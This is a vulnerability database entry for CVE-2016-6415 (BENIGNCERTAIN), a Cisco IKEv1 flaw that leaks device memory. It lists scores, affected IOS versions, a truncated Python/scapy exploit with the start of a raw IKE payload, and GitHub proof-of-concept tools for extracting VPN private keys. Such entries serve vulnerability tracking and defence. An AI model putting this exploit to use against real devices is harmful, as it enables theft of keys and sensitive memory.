CVE-2016-6415

Published: 19/09/2016 Updated: 03/06/2020
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 506
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

The server IKEv1 implementation in Cisco IOS 12.2 up to and including 12.4 and 15.0 up to and including 15.6, IOS XE up to and including 3.18S, IOS XR 4.3.x and 5.0.x up to and including 5.2.x, and PIX prior to 7.0 allows remote malicious users to obtain sensitive information from device memory via a Security Association (SA) negotiation request, aka Bug IDs CSCvb29204 and CSCvb36055 or BENIGNCERTAIN.

Vulnerable Product

cisco ios

cisco ios xe

cisco ios xr

Exploits

#!/usr/bin/python
# -*- coding: utf8 -*-
import socket
from scapy.all import *

# ---------------------------
# Requirements:
# $ sudo pip install scapy
# ---------------------------

conf.verb = 0
RCVSIZE = 2548
TIMEOUT = 6

payload = '>5\xc7\x07)\xdf\xed\xef\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02'
payload += '\x00\x00\x00\x00\x00\x00\x0 ...

Github Repositories

Simple exploit test for benigncertain (Equation Group's BENIGNCERTAIN tool - a remote exploit to extract Cisco VPN private keys)

benigncertain: Simple exploit test for benigncertain (Equation Group's BENIGNCERTAIN tool - a remote exploit to extract Cisco VPN private keys). The port is based on the code from github.com/ross-bradley/benign-certain. The script is meant to be used as quick verification for the case. Other methods include metasploit's module and a more extensive version can be f

Re-implementation of VirtueSecurity's benigncertain-monitor

CVE-2016-6415-BenignCertain-Monitor: Re-implementation of VirtueSecurity's benigncertain-monitor. Doesn't have all the same payload options as the original, but replaces the bc-id binary with a better proof of concept by Ross Bradley that can be expanded on if necessary. Credits: Original monitor written and maintained by VirtueSecurity at github.com/VirtueSec